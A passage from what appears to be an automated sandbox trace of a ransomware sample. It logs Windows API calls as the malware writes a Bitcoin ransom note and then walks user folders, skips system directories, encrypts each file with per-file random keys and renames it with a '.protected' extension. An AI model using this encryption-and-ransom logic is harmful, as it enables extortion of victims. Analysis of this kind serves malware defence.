Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.691] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.692] lstrlenA (lpString="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") returned 684 [0084.692] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.692] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.692] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.692] CloseHandle (hObject=0x14c) returned 1 [0084.693] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.693] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0084.693] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0084.693] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0084.693] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0084.693] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0084.693] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 81 [0084.693] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0084.693] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0084.693] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.693] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 81 [0084.699] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0084.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 81 [0084.700] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0084.700] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 81 [0084.700] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0084.700] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x43, lpOverlapped=0x0) returned 1 [0084.700] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.701] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x43, lpOverlapped=0x0) returned 1 [0084.701] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.701] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0084.701] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, 
lpOverlapped=0x0) returned 1 [0084.701] CloseHandle (hObject=0x14c) returned 1 [0084.703] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.protected") returned 91 [0084.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\desktop.ini.protected")) returned 1 [0084.704] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.704] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0084.704] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0084.704] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0084.704] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0084.704] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0084.704] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 79 [0084.704] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0084.704] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.704] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.704] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.704] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 79 [0084.705] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0084.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 79 [0084.705] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0084.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 79 [0084.705] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0084.705] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.707] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.707] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0084.707] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.707] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) 
returned 1 [0084.707] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0084.708] CloseHandle (hObject=0x14c) returned 1 [0084.708] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.protected") returned 89 [0084.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\index.dat.protected")) returned 1 [0084.708] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.708] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Windows") returned -1 [0084.709] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Program Files") returned -1 [0084.709] lstrcmpiW (lpString1="KQMHSVKD", lpString2="Program Files (x86)") returned -1 [0084.709] lstrcmpiW (lpString1="KQMHSVKD", lpString2="$Recycle.bin") returned 1 [0084.709] lstrcmpiW (lpString1="KQMHSVKD", lpString2="System Volume Information") returned -1 [0084.709] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD") returned 78 [0084.709] lstrcmpW (lpString1="KQMHSVKD", lpString2=".") returned 1 [0084.709] lstrcmpW (lpString1="KQMHSVKD", lpString2="..") returned 1 [0084.709] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*") returned 80 [0084.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0084.709] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.709] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.709] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.709] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.709] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.709] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\.") returned 80 [0084.709] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.709] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.709] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.709] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.709] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.710] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.710] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.710] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.710] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.710] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.710] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.710] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\..") returned 81 [0084.710] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.710] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.710] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.710] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.710] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.710] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.710] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.710] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0084.710] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0084.710] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0084.710] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0084.710] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0084.710] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 90 [0084.710] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0084.710] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0084.710] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.710] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 90 [0084.711] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0084.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 90 [0084.711] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0084.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini") returned 90 [0084.711] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0084.711] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.712] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffffbd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.712] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x43, lpOverlapped=0x0) returned 1 [0084.712] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.712] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.713] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.713] CloseHandle (hObject=0x150) returned 1 [0084.713] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.protected") returned 100 [0084.713] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.protected")) returned 1 [0084.725] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.725] lstrcmpiW (lpString1="fwlink[1]", lpString2="Windows") returned -1 [0084.725] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files") returned -1 [0084.725] lstrcmpiW (lpString1="fwlink[1]", lpString2="Program Files (x86)") returned -1 [0084.725] lstrcmpiW (lpString1="fwlink[1]", lpString2="$Recycle.bin") returned 1 [0084.725] lstrcmpiW (lpString1="fwlink[1]", lpString2="System Volume Information") returned -1 [0084.725] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 88 [0084.725] StrStrIW (lpFirst="fwlink[1]", lpSrch=".protected") returned 0x0 [0084.725] lstrcmpW (lpString1="fwlink[1]", lpString2="RESTORE_FILES.txt") returned -1 [0084.725] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.725] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds 
Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 88 [0084.726] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0084.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 88 [0084.726] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0084.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 88 [0084.726] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0084.726] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.726] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.726] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0084.727] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.727] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.728] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.728] CloseHandle (hObject=0x150) returned 1 [0084.728] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].protected") returned 98 [0084.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1].protected")) returned 1 [0084.729] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.729] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="Windows") returned -1 [0084.729] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="Program Files") returned -1 [0084.729] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="Program Files (x86)") returned -1 [0084.729] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="$Recycle.bin") returned 1 [0084.729] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="System Volume Information") returned -1 [0084.729] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\ieonline.microsoft[1]") returned 100 [0084.729] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.729] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.729] 
